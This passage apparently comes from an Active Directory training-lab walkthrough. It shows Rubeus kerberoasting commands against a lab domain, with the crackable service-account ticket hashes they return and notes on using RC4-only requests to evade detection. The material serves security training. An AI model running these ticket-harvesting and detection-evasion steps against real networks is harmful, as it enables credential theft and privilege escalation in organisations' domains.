| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2

-------------------------------------
| Supported Encryption Type | Count |
-------------------------------------
| RC4_HMAC_DEFAULT | 2 |
-------------------------------------

----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2022 | 2 |
----------------------------------

With Rubeus we can look for kerberostable accounts that support only rc4-hmac to avoid detections
based on encryption downgrade for Kerberos etype ( used by the likes of MDI - 0x17 stands for rc4-hmac).
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /stats /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

-------------------------------------
| Supported Encryption Type | Count |
-------------------------------------
| RC4_HMAC_DEFAULT | 2 |
-------------------------------------

----------------------------------
| Password Last Set Year | Count |
----------------------------------
 | 2022 | 2 |
----------------------------------

Display all Kerberostable users

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.

[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain : dollarcorp.moneycorp.local

[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc

[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*websvc$dollarcorp.moneycorp.local$SNMP/ufc-
adminsrv.dollarcorp.mone

[email protected]*$9587BC6B19255C02FA14170A6F88BF9E$EB9C059

B65FA9BCE94510BC31E88C11967EA9666ED29CBDB7325CEA6BFAEA7D053778CE0412F7CD82232A64

1D363E38EEF53A4ECE580BC393946FF1A26C0C19C2444129843783B08DD914FFC9D1706CEAAA0CA7

E716AA112195AA1B1E04F2851B0A77A87FBF79282E1210D698F3D8FE6785D71A58A48DA975797DDC

DDB5428D0149B6DC985F7C310BE21C5D7D046BE6AC15ADE71E76FAFEEDD980893212E6EBA878E026

10B4DAF7938E24BCC0A7A0322914B94CD7AA21350A228625DDA70C8A730BE9E174BA20D3948E6F80

344D18945950E537DEE26FD42B5B78EAAB904CAEE136585B9655AE640A34C334F56C825D73588F2C

39210BAF45419BDD48F4747A98EDB158C5A6057C3189D643F481F36BDE80524CCFDEFD5E9F223DFF

B811E4DC3E9EC2B58C341715B127C17FB0932CC88DED458D02E3E1A151106532A67920271E3E0946

731D336A9904BFE971C75052C43E2A892069B816A8BB9D07A7CCD96E71E69D616C5C95D4F9FEAFB8
5E8AEF0DDE28853109B7C47AE974C3023EB3623CD67078B12268664C20C3A10495BBDA9571B42D1B

62B6A8FC0397E515077F40FACEB4832211D61F91428A2F1D763DD9FD1B86C51D3DED03A1285C45DB

844FE85B3260E7681337603AA32CA4531A7117DD448D253634FC31E3B9CF01D6B74307E3A2E0021E

BF6EEDAE5CF80F799FDC95A8CF690E122BB90D00D0E66100287F725B4BB77610C609F0C47D146328

5F87BD292182924F76DA25EB4A19DE61637BF72A6AB11421D3EB88FFD87A72A5A3EE5D4100C111A3

C75B1F3DB5D810CCD044896C5A3FB8BE5E67957CD7B4B9548A38CC2A1125CF06F898D8ADE2F58E01

BF0088B1571A5E9C9E1A7643585FF42D622AD1C5E3202F3237C252DBD8BDD1767038C98B43983A14

32E9DB7695D1CC9B76651B5FB30758A8B6EDD3AD5BBC523EBB9A1769AF44A1B002487A42B503F0A5

FD78EC7D9E71399B14C4EB9031B7397082F2994D30069D88D16DAD22668CF12809F993C49144A094

66AD6320C0352B4829EE1C671B5F347FC49D2EB2048DB80B68A85E6D06982894BA188F6792CA074B

0A25ACF68602CAB5E27942885F713A7C836EE59A0BBDCA859FF6E377933EE600645AB81AB3A8D683

CCA2870D1BDF03AD0F61939EB0AB1A46F6E93EECB10995EE3F8A7E3D960E59E0B22C405F9BA1730F

263399B5A8A5AB0C3518E7FEA53291BE856068A1E1F02D04C6C1676DCCFA50F10ED507609B64704A

BD05B0484B60A14403A607074E44851DEF994AF042BBFA1B09A73A3A0D1D9E10FF33FECE43335352

645BCA44E01149FD37F7D6FC3D8215C6C432E474C24B79E7334BC008802E7FF6476BD83D39EFB097

74DDF662A917F87B2067992F82C62CFBDAB1880EA1864F53D3394A4448819E5C5DEB5500430D2BD6

DA10ABB35C1365CE847CD6B95D4DB3614E15E4EDFC675CAE7BF6FA3D13A97AB7A7C227CEC8141C44

97886EE158640F6D59FBD940E6CCE87B1129245209E6A5B0EC4CF8359DD7124E3C65D42503D5D170

F250F02DFE29854B94036E48C5441F8234846ABA6383E56424CFD0A68D62700201B61894A47B439D

F0FB5374DA29E9EF59036D7C27893BE4FC21D96A26FF6FA2DAF14D06138DD6CD27B3CF7F319F2F91

EDB4A1045406703441BC4F07FEFF5EB5A6ACEF10394CFAE9E68F1159ADC9E0971D4E40035772C046

A33697EAE03F7EE22153BD504BFDDA63C1CF9130C73C5C90331D2AE4B40F209B59F9FB186C61CCEE

9A4361B4FCF20E06D66B437B8A60A2FAAA36B470921FCE641DA2742BA9C9B3EF6E43DE8668F71662
B738A71

[*] SamAccountName : svcadmin

[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.

moneycorp.local:[email protected]*$C093BC24478252E64098D00A18DF30C
7$84035C5367BB152D86D341BD1FD14A3F70474486422E2AA170792D501FCB19815DB7C216F30551

06AE97BC36D790D522D0F61AE707E9123E0A01C04E507169C085EBB824EF42702956579FD6CEF028

01867D8829B11FF81446A78A275971292C159C7591BDE89B9AA65355F3B6A48B6A052112D420AE2C

74A5E2B699AEAF417F8FC028814A880317ED1D3A98E1044ECD273888F7ECB452236C2B9DF2C3A002

EF73BFA6D37225C98107978CB6F62E06338FEE8A0F48702C605D38CC073093F12B16500BA525A754

F0783DB5CC11A5883E3A60C292CE0BA5F149CC4B530980C84AB5A3DFB90BF1CFF34BC62C8C821BF4

7E7E4C8FC3E1CECF16611FCA4E1D0950E4AAADA64BCE4647A458DA66AAE164B425459459AF30DD1A

23D38AE91CB61ACFC6F1A7549A7BCD3BFE3C86EF4553434E432C0F368EAE47A0461FFCF8759F8230

36938849D71EECAF93F64A513834AF0BBEDA6D155AFE86916E6868793AFDAC758A7BB17926C17A9E

B57255301B94C3BC17591F43224985B3C204B42001D133D14883E53846879EDB8725AE49FCF87508

C1F0B6E3A8DFBE504842F87BBACE0F2FE7DE9EE9EB24AF14E5F5EBB51EF4A121E259A97CC80B5E12

60E4E8E65F15D1F1323CE6A5A303ADB006B78B79E5DDECDF5C9A357C57C7444560D3403318814160

FA01F92634DC9445DCC8FE0FAEF148DB18032EBFDAD6429F0B0B6BF2E19DCB783874B9DDF3D5C5AA

5F037E7A8C6C81DD224865835164B3A2D9C66E26A0DF706AD58B028DC7034E7DB4CA08E3427FCA97

4868C0F4A6B1BABA5F1E68083BDBC407D4E512C7A1B2BCDC76C94534989F59D8DBE10E21D15F358E

2C5B0C0B05B69DC2BD78290D0F1860F19B46622F9D72471A8C7FBABE99FF885FFD96898A9FFBB604

5BED96AA9C95351999680C14DE85DA560049038B81857B9A5FDD3BF91CC891A5C8B53B01F3198409

2CE69D4ADEED66F947BCD09F75B27EA5D8930E25F859CCAFCB002E1B63167AE245BF953CC3B4E101

8E23AD890BC78F80DBA44BF02E836312EC72B312431644D5CF425D8932488D28171536467833B519

3CAC377E7AC38240C1509EA5FBC9A8FC8FD834D19C23C0CF45867D603B6ACBEFA146C09B4D6ED8E5

AF53A28314D245CFD647DF18866A0D7733319845FF9C0F146B25FEA7EB56B998E72DF61A060BF9D5

E51F82B55CBC993F99B4BF9D7AA95558574B76B8E68C46033D43F61054E131327E7E452AA12F4C1E

8C67F5EF5FE4985AE0B9ED5303D30EA0564B199C1D315707F212CCC3AD13540D5787585FCCA27473

478CA466F2AB48246F60327F46DA29F8285C1017868362E9A2840D986431A5483986C51EDA284832

519BDE9599CE82D6D4440A128081E3958CD2EB63FD03B2DC20AE20B635A60EAF750D38FE05DBC942

C658C9584F1AC291643CCC37DC2631D96FAE6AD58EC4DB0BD7F4201DE789D6168A8B829C40914BD7

D54C8818B21D0CA347A96F3C1F5988F9901F7BDD863F2473B8191F0494C54E45160F7647D884A03B

30454E4024F75FD5ED6E9CA62DA89F983502915CBF7194EC71F6F312F0F0A54C814BC9802CA83FC4

847FE2716026149BAAAC1A0E427E814185DFA173015AC86D43E066FF86B4EF23AB450C6A8F4DCF7A
A25E48ED53AFBFF1AFFEEE391FC9C2A075E2889023372E69A3E204C98C04841600832B275AD2D7D3

E0B7C7A025F743D1B313B3291DD1A61F3DBA6FA57A3A583C4A4FB7289F4BA62BFF3A8C038618CA2A

ED1022A151ECEA239B0443A4222886E6D75AA038AFC4E384996A9DC809A7F9DA60C5447FB394343A
A018A9D2D998658E

The /rc4opsec parameter in the Rubeus kerberoast command is used to perform the Kerberoasting attack
in a stealthier manner by specifically requesting RC4-encrypted tickets. If a user's account is configured to
only support AES encryption, the /rc4opsec option in Rubeus will not work because the Kerberos protocol
will not honor requests for RC4-encrypted tickets for accounts that are set to use AES.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc

[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*websvc$DOLLARCORP.MONEYCORP.LOCAL$SNMP/ufc-
adminsrv.dollarcorp.mone

ycorp.LOCAL*$1CEAF77F9DF441C87A56C25E8ACACD48$83B84DB45C46847FB56C536F45C138CBA7

1DE165DC9BEAF1F674993044032B8BDDD7FCBA2E4FFC7703B55EA86C9E9B563E34485A28693827A8

DE210D0F332EE173B8218C6EC8374C50C250C84386B9143CD0DFFC3A130F80B94CE1A302A28830EF

5286F6DAC85878B8E5758F6E7CAE1496E19BD6531D2B13208E9316A1CC7524E2E48ED906BA8211D7
BE182F14D82C62433AC3310D9F79C627C3D1D41AC58A381D76FD7DFC9D1FE3BDA68835F5F1356244

0A6D36E62F71CDC1D79E82143AF0F98E6158B1B62BAD4FE63968DE073CE7C50C6EF6FA692427DF54

E24F61618042AE4832D25EC567DE83DD10DB3B834C2EBBBDEC4B276399F50B56FC70A743599396B6

0623CF76E0FAF3823DFA5A1E10752AA01322336A8674B64A2679A9EE7E08116E09C8593D4C5FDFD1

000BD8BF71E30DA1ECD5A14DE338A43348E09911ED43ED695F962EE3A85E4635E19D5E7B73393A78

BD392D48364817C7481EF03B7DBB64F0468D389556E68D2B399C5D4D8B3B34A7EFB9F1B5BFBC2392

2B326E0EC0C2E483D47BB920A26E23967B2DEC31AC54C3A1A2C3C4FCA6502D77CFE34AEBE19F3753

AC8BB0EBAA67237ED65AD3D9187791C096893241F523DC39F7959206A5B64EFA4497F3F090D1373B

B0A3A8146D96085820C9662A23D32A02A547A78058A1BFD933AA34ED215A0E13DDE51E775DB8979D

459A6009FAA6BADC4E1D9DA974A432906717261B2B95ABE70670115A2443138277C3B0D2B9C4C84E

996861DB2D364D03899685374257DD0FFEAA5770EE233A424109F7159BC0BF7508CF0FD7DCCF3592

489CB9D61B005531500E4ADECD22DB7035E3A69CB17F89FB8EB11C7C2C213201A9175FC89D2BFC10

796E83B6BD6CF94C8968A789EA90EF695309BD97384E0D276E4289D8631696B4DDD8E5A0866A6A6A

38EE93AA319C837549B711FC257F174C256F9D974CED2DE5CA72A17694865C3B3817C9EE881E4F3F

EAF4AEB6C130DCF089E7AB7E212A14A593E7E0C68A821DBBC90E76BE4C917513B4EBC11CF32091B4

3DBD128C482577960C1BE5532889F914A17E5ED812FEE2943B011E643A2F66469B449FBD4FADA6A8

5E1038FB5F74BBA56195F788A6714E30C1CE0E0EE4EEACE7378FDC14CF3456C9024A03464720974E

0CBD0B45896D99D330FE44C5632CC1E269C8BCA5F5EF8E68E717CEDE812E6E242890FA8FC7AFC06D

7159BB263B6F37BCB493A52B6B828FF138428E5C7EAA77B1DE228798F50C3606E41D76565885C7EB

130CCC4D0F96010A7EF66570D1261E2D8340F467D2AB5ECCF9D89BAF4377B8512581C22B3B401DD3

E9CEB210EFB32506F40AECA148089D62E11A96E4C5F0D992FC3AB3CDAA7F39851E0D6E1F3CAF2BBD

921E9A567F7660603CA3D84B4A8F00BB8221A98ECBB2FFD5404AB1501A11A34F8638617552CC50BF

CB41252A66CA02271CDDDE4C7C3A303667B1194A61B3FEBF5E711B900BD54166A1A5D899C595CF59

35A85B46CB7A914D22B09A7EBB88AEF45D1239DB46EE9027FCD5E25782E0A087A11B2CE81B2A08C1

6CCCBA228C23BCDFDB965E13A05E8F3145D9C45C0388AEE099CF34BD02BFBBA7D1A7793F40E6E557

043940975B8DD09A19DEF11A71CA85AC4C0FC39DCF5FDAE7E21257EB521624A99AE271498C1269D1
1567E76F

[*] SamAccountName : svcadmin

[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.

moneycorp.local:1433*$AA82B23CBBA1C06A0E5376E90081A01F$C450985FEA884233A3BA853A7

D9CECFC154233D4ED6D3EE58789C16FB4956D0CEB8FFC93D5AEA559A9FF3E4D0AEB8751CAE1FA7DF

6B64E3539F67A114FE96B44065E7CD5BFB2675D86A01C4038A9033CE90683C74B678BDE9FFB00030

CC688CB5A6E8E9E8793AC1FFFDFFB11F28D843B9DC18FFE76995CAEABC93787CCF6956B129090733

075A3CED5B956C5FEDE37A89AEDB8B560FE6E196398689EFBC244EC553106418A2998C3599C8B57B

92C5C2F71E05CA6AB927266D49EB51D2153F14C67E52C21C498A2EB327E446DE585CAF3040F9A64D

2083F618D227EA69585B4B65A025C3E48EB2277EF008D2E22C3C70F013CB15580C445608F365F262

C33D5734ADF2DEE78A8C7D53ACE994C40AF33EF7C976BE5F3DC5DBC0386B5F66776EED1DE2506154

246C67CB6E1924AEB27762A518D9E10CC9958FCC6A077D16F5983F1AE4D7D754EDF1C601E0D28DDF

9291DCC0C724DED27AED68A7957DBCCDA93C57A49BFDAF508D620C4C325EE5AF294027FD23A61FC5

21303008B67303258894FDDDD0100B4C1A9AF732B6B425CF1CE06A3F3377A40865AEDD2A8DD00E7D

63D48104C7CF58F2E0CD2FAD507DD719A07DE377198CB9B709AAB745B03CE0ABB8B8C4DAB60361AA

CBCE297D4717611EBD71B78486CBD7778107044C096126E63ADC4C5627D7FFFE68F5F1A5B91D4AFA

457A60564F39CCD337B81302FC5ADF9FCC58C91812C6FA61CD8982B490A4B9E9439E3ECF7DE54DF4

4B141B5A5F5073847D27E7FF598C603E2546D0064BC83CA5CFF00884ECF5E985A30A19F0792C1B78

AC0F501C91C1DABEAA36A2E8FC4C1770D5A53FB8F08AEB3293798D9B968382836236B19B65DB40EF

3A8D7E85E5141962FFB87489078AF63420EA2BB82DF5BCF90290D195D4C0264224B145439809D189

18BCC5CEA91F282E4D67CDC73F2036E1E1DD9B79A24111A62290B6CB6205D9294A9D0E0065458EC1

86A7EB839C550090AF90A0A54EFC398DBF40859B47168678EA6208A32FFC59C0218B31C5CFF6DB5E

124ED23057D9C8CE1EAFE517E3B299F0FF64D8F2C814D0BC4E7274FC9FFE7B63960782A540AF8FB2

B7FBFA5D05617B1E283DC751004A1FA3EB9AC1ADDB1833817A78301DF876607C40EC377D3DD7561D

6B4EAE3B881334056B7FC18AC3F548B62EA7AAAF0E8F73B4A652805689F317BA5921F96CD0C26032

27EC7AECE86FBAF49815CA3AD9F5C2BE1AC8339E9C717A7A7671D775D539DCD6F42FA51DBE6FE817

523B5D0FA4B72AC64DA404048F7B67E1C14FBC7D5F740CC8B4C6F932200F1D4DED8D7032D467F6AA

7F0C0FB4C24EF79994FA340E4BD8D515231A3F7933621F668322D69EBD5A22839C4F4FDF5CFB1E40

D54DE02C088EBEFC8800D879A573A1A2D116B0FF92C9001D164A073ACE0C863EC9DC51181D8F3576

9A9AFC7B37165D7BFF1ACDCAF29311841BFFF8BC1352C34B2AC880C06C67B7305FA470F245E741B9

8E1AF6FD9969871C165F1C231F67BCF3C7B4C93FE04063B859D2672A49E05734FC71A7F472FC51CB
AAD73B790044A9CBDF7AE75B62C900E57A83D8C457E4B20769D04A126ABCF7CBC0E4DCA20EE9D234

D94B5510D1E51259FC6767EB12A57A3F52EF622E80E1E344888F9B271C02FB6D5D7D55A292BA89CE
661AD4628F54D6996

Performing the attack

We will use Rubeus to request a TGS and generate hashes

Requesting a TGS
C:\Windows\system32>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.

[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : svcadmin

[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountContr
ol:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:[email protected]*$C093BC24478252E64098D00A18DF30C7
$84035C5367BB152D86D341BD1FD14A3F70474486422E2AA170792D501FCB19815DB7C216F3055106AE97BC36D790D522
D0F61AE707E9123E0A01C04E507169C085EBB824EF42702956579FD6CEF02801867D8829B11FF81446A78A275971292C1
59C7591BDE89B9AA65355F3B6A48B6A052112D420AE2C74A5E2B699AEAF417F8FC028814A880317ED1D3A98E1044ECD27
3888F7ECB452236C2B9DF2C3A002EF73BFA6D37225C98107978CB6F62E06338FEE8A0F48702C605D38CC073093F12B165
00BA525A754F0783DB5CC11A5883E3A60C292CE0BA5F149CC4B530980C84AB5A3DFB90BF1CFF34BC62C8C821BF47E7E4C
8FC3E1CECF16611FCA4E1D0950E4AAADA64BCE4647A458DA66AAE164B425459459AF30DD1A23D38AE91CB61ACFC6F1A75
49A7BCD3BFE3C86EF4553434E432C0F368EAE47A0461FFCF8759F823036938849D71EECAF93F64A513834AF0BBEDA6D15
5AFE86916E6868793AFDAC758A7BB17926C17A9EB57255301B94C3BC17591F43224985B3C204B42001D133D14883E5384
6879EDB8725AE49FCF87508C1F0B6E3A8DFBE504842F87BBACE0F2FE7DE9EE9EB24AF14E5F5EBB51EF4A121E259A97CC8
0B5E1260E4E8E65F15D1F1323CE6A5A303ADB006B78B79E5DDECDF5C9A357C57C7444560D3403318814160FA01F92634D
C9445DCC8FE0FAEF148DB18032EBFDAD6429F0B0B6BF2E19DCB783874B9DDF3D5C5AA5F037E7A8C6C81DD224865835164
B3A2D9C66E26A0DF706AD58B028DC7034E7DB4CA08E3427FCA974868C0F4A6B1BABA5F1E68083BDBC407D4E512C7A1B2B
CDC76C94534989F59D8DBE10E21D15F358E2C5B0C0B05B69DC2BD78290D0F1860F19B46622F9D72471A8C7FBABE99FF88
5FFD96898A9FFBB6045BED96AA9C95351999680C14DE85DA560049038B81857B9A5FDD3BF91CC891A5C8B53B01F319840
92CE69D4ADEED66F947BCD09F75B27EA5D8930E25F859CCAFCB002E1B63167AE245BF953CC3B4E1018E23AD890BC78F80
DBA44BF02E836312EC72B312431644D5CF425D8932488D28171536467833B5193CAC377E7AC38240C1509EA5FBC9A8FC8
FD834D19C23C0CF45867D603B6ACBEFA146C09B4D6ED8E5AF53A28314D245CFD647DF18866A0D7733319845FF9C0F146B
25FEA7EB56B998E72DF61A060BF9D5E51F82B55CBC993F99B4BF9D7AA95558574B76B8E68C46033D43F61054E131327E7
E452AA12F4C1E8C67F5EF5FE4985AE0B9ED5303D30EA0564B199C1D315707F212CCC3AD13540D5787585FCCA27473478C
A466F2AB48246F60327F46DA29F8285C1017868362E9A2840D986431A5483986C51EDA284832519BDE9599CE82D6D4440
A128081E3958CD2EB63FD03B2DC20AE20B635A60EAF750D38FE05DBC942C658C9584F1AC291643CCC37DC2631D96FAE6A
D58EC4DB0BD7F4201DE789D6168A8B829C40914BD7D54C8818B21D0CA347A96F3C1F5988F9901F7BDD863F2473B8191F0
494C54E45160F7647D884A03B30454E4024F75FD5ED6E9CA62DA89F983502915CBF7194EC71F6F312F0F0A54C814BC980
2CA83FC4847FE2716026149BAAAC1A0E427E814185DFA173015AC86D43E066FF86B4EF23AB450C6A8F4DCF7AA25E48ED5
3AFBFF1AFFEEE391FC9C2A075E2889023372E69A3E204C98C04841600832B275AD2D7D3E0B7C7A025F743D1B313B3291D
D1A61F3DBA6FA57A3A583C4A4FB7289F4BA62BFF3A8C038618CA2AED1022A151ECEA239B0443A4222886E6D75AA038AFC
4E384996A9DC809A7F9DA60C5447FB394343AA018A9D2D998658E

We can also specifically request a TGS using RC4 encryption only. However, if the account has AES enabled,
then it will not work.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountContr
ol:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 1

$krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:1433*$3C2E3BD874DA5BED14ABF5F25E8875BB$BD4B4B4A576518D0F5C7E1303E
C69FCCDA3DA61E4DDA54C96A49F6488F9888C5129A1512EF9E2681081D70A3D8F4595B454BDBC40E0EDBF7888B00472E7
98D7AAFA25E1F27C13641C423412375773CCC2B4FF32D2AE0BC994447EFD9B1EE7DA3A431F083832A31718706B69D28BF
B9D5F2810D4B5E446CE8386E0FD48F66065314C7F654B12E0272DBCC034A29A5A681A13F908E136D9B2177245BFF4C0AD
05620C0C3D6CC7C5B4AA9E173096A97562894242DC329EE7C9171FD2C3CEBD3D8D9266E9B5592AF75C33DCBB074CD5506
FCBF32A1726FCBF32E12390F0BB8F49B1C8486C7C0631B3D344037D8BA3ED86D199311E5C9AAFEEE09783337C59C214BC
9B2686F6FAFB582EBD80B641BFB3F97B9338FD9835A858A8813F111ADBD96A3E2BD1D64753EF4FA87531097449324944A
22E7D1208460C80E4B4CB0478A10EEBEB7D9553D958B0DBF6D100E62D6885A96F9FBB4A9BE5BE786F10E29867CC9A0CE0
0477868B239C03C512D13AFDA5110A99D2ED88710A507DCDE6AC88188ADDB5C462242C1E548AC83E876108EAFB12074E5
9D776C20F7F8BBF8A1A59FABDC924627570B1076000309CA1F6A193D0EC52E5B6D9376D972C8E0CE791315DF4A527DC18
97420B3630AF5F2C27BA0FAE8EB066BA174212DF1DC2C5C8CE4DBAB15E0C1F3614A1D0D3D0583CB928875C009B26B159F
A70ED556D8340AD4F8691A79B24DED77AA7EA957527F49D10894F0036297AA1B01913C199FBF17AE41278DB505FAFE216
31BFE9AF4B94FBF5C9BE215DBE7B5BEA764BD5485325C904D516E811D181C7840C2890135A21BAA80AB8E8EF144874084
7B2133D2E6A69548B610BCD6952779F8D6E4A259502D13A256CEE0488C05FBAD56A6530776955550B739CB27FB1155C69
ECC626152FE19C75E1E3AC6BDBF820E21065DD4C811DC8BAABDA94C2CB2E5A42C34AFD2BEEA4B64D13A8A6BB53B34AA5F
482EED62F32D6CEDAE535ACB78C6D26BD4FA80E82807B8214C09B8BA9EE64F96F278728F4474F170EC359835B4E45A0BD
82854B73FEF4EA1F906A44CADF8D9008C06EAE90BECA2BD7CF8EF4C0B0797C0A4FD6ECB3B56A77DCD64F654CA15011D1D
BFBC11CD22BBB5EA9155F2BCA696FC9F8C0BA684B05A1FD890503FE88ECD74B2CA24D77DA28DB1FA988DBFADEAC4EC71D
3DF7850005BFBF8A5AA4FBD43F9471FCEFA943092F952E04C9C0B5E821BA64C617FE63B3EA3FC068AA11112760A0CCF60
011CB088BED7644E9DE257748C6857418C4A758E68A0413465FAD7A39E74EDD72788D35A2576CEC29CC43DD63D2BA6792
1F0CBEC40FCAC4891EF65DA90697840F22588F52B24EA30BADA604882493907CA05A4168BFB3202BA551177308FFDC7F6
92A2847011339266EF8E4424F5F13AF00DF1DFC4D62C8848122D3FE4294FBFCFBA3017D683DEE42948AF7D49A2F4FEE89
D28CA217A64D70351AC9F9BFE8F7B943ECA284339CE9978F1703270DDD61ABC1294D5FDD0DD205C0FBDF27F1299295173
FC16D299CA3242D001801F34273CF676BE1D5BAB6E585814286C0306F2033316352B8471DF03D8132062E040990A2E9FA
9A5A24F550BE1FF8419D790E847F20111F047106E7EE23D8F8F5158352ED61E955094812D1F2BF828F492239AB061095D
87810161

Kerberoast all possible accounts

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /rc4opsec

/outfile:C:\Users\student163\Desktop\shared\hashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
